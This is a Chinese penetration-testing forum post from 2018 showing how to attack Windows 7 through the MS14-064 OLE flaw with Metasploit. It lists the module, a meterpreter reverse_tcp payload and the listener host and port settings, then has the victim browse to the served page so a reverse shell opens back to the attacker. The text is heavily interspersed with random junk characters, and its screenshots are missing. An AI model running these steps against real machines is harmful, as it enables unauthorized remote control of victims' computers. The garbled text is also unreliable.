中国网络渗透测试联盟

标题: MS14-064 漏洞测试入侵win7 [打印本页]
作者: admin    时间: 2018-10-20 20:20
标题: MS14-064 漏洞测试入侵win7

( w: i" X, J' \# q( S 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示 ( J+ Q8 s6 T1 S0 N

; ]; m1 q# ~) ^! a

; k) B b2 i$ C- b 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: 1 g7 D* H! _; }1 A. B/ {9 w

, \5 u& L6 w# i" i! b" A, q% L

( h x' `5 i d 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp - ]+ V9 x/ _3 B( [ H7 k

" Y. s6 u7 W& F' q. l

9 W! b+ z( N9 i0 G& o* [             set AllowPowershellPrompt true4 i9 A5 F4 f4 N) L. \, U

& h% Q. _+ ^- c' N4 P' i$ Q

$ V. @# \% ]/ Z V             Set LHOST 192.168.0.109! S& W) h: a" Q* |8 D# X0 p$ h% J

# x2 W$ J* w. A$ C" \$ r/ ^

$ A1 ]5 V& U5 b! T9 e2 i! ]             set SRVHOST 192.168.0.1090 u3 I* i+ O% D( C# a

( M v/ E7 f! [1 f, J1 ^$ u; v1 k

9 a9 G8 A5 ~5 E             Set uripath share % N( l" m# i) d; ~0 x( O& u

# C% n, X1 a2 _7 O% D4 u; \

* w W5 Q; l% Q; N! B' l             Set srvport 80 _1 U3 Z% w# A% [7 r

# g/ Q, s0 U7 D4 v+ o! T

& Z$ j* [3 @4 N# O   * t" G/ L5 r8 I3 Z1 G; r. ]8 C

% P. Z6 `; q/ O! ~

+ L3 S/ U" k- _0 B, C5 l  " U8 u6 j z! `' O2 U, H

5 m4 J' s8 v, s' w, ?9 J, |5 I8 T

3 L5 _" a. y% O9 j" _) V) ]* O: I   P3 H9 y1 ]& e& b% G5 R

8 K# \ t1 k9 p/ _

2 ?! ~2 W/ y: [7 T S9 e   9 o6 K: e `% k% c

( N+ ~! k; A4 ^9 Q) L- B

4 l$ [0 v& k5 s$ O  6 F* F, ?7 I5 e8 S- g+ w

) A2 Q! {/ Z! m9 p) V( |& T

" v p7 `3 I- T& q0 R 下面我们来访问本地地址如图: " O- ~$ p# K0 z8 u

y( e& g' o% {" a- l, Y

& D9 x% _+ p5 c" w  ) y: }; {3 @4 z& |5 z$ A$ g

$ Y& H1 a5 L4 [9 J8 Q5 A. n" G9 g. Z

: ]- u+ Z6 |. m  7 \; r& f# V/ ]) h" b- H3 `

) R% s/ M& B; S5 p

~2 T1 m+ b" t0 b 2 ~" b2 I: r7 h





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2